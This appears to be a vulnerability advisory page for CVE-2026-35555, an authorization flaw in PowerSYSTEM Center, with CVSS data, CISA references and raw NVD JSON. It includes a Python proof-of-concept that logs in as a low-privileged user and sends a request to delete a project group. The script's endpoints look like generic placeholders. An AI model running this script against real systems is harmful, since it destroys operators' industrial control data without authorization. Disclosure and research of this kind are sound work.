Security Vulnerability Report
CVE-2026-35555 CVSS 6.3 MEDIUM

CVE-2026-35555

Published: 2026-05-12 22:16:34
Last Modified: 2026-05-13 15:52:57

Description

PowerSYSTEM Center feature for device project groups allows an authenticated user with limited permissions to perform an unauthorized deletion of project groups.

CVSS Details

CVSS Score
6.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L

Configurations (Affected Products)

No configuration data available.

PowerSYSTEM Center (see the vendor advisory for the specific affected versions)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# Target configuration
target_host = "https://<target_ip>"
project_group_id = "12345"  # ID of the target project group
login_url = f"{target_host}/api/login"
delete_url = f"{target_host}/api/project-groups/{project_group_id}"

# Low privilege user credentials
credentials = {
    "username": "low_priv_user",
    "password": "user_password",
}

session = requests.Session()

try:
    # Step 1: Authenticate as low privilege user
    print("[*] Attempting to login...")
    auth_resp = session.post(login_url, data=credentials)

    if auth_resp.status_code == 200:
        print("[+] Login successful.")

        # Step 2: Send unauthorized deletion request
        # The vulnerability allows this user to delete the group without admin rights
        print(f"[*] Sending deletion request for project group {project_group_id}...")
        delete_resp = session.delete(delete_url)

        if delete_resp.status_code in (200, 204):
            print(f"[+] Exploit successful! Project group {project_group_id} has been deleted.")
        else:
            print(f"[-] Deletion failed. Status Code: {delete_resp.status_code}")
            print(delete_resp.text)
    else:
        print("[-] Login failed. Check credentials.")

except Exception as e:
    print(f"[!] An error occurred: {e}")

References

- https://www.cisa.gov/news-events/ics-advisories/icsa-26-132-02
- https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsa-26-132-02.json

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-35555", "sourceIdentifier": "[email protected]", "published": "2026-05-12T22:16:33.630", "lastModified": "2026-05-13T15:52:56.850", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "PowerSYSTEM Center feature for device project groups allows an authenticated user with limited permissions to perform an unauthorized deletion of project groups."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.0, "baseSeverity": "HIGH", "attackVector": "ADJACENT", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": 
"[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.1, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-863"}]}], "references": [{"url": "https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsa-26-132-02.json", "source": "[email protected]"}, {"url": "https://www.cisa.gov/news-events/ics-advisories/icsa-26-132-02", "source": "[email protected]"}]}}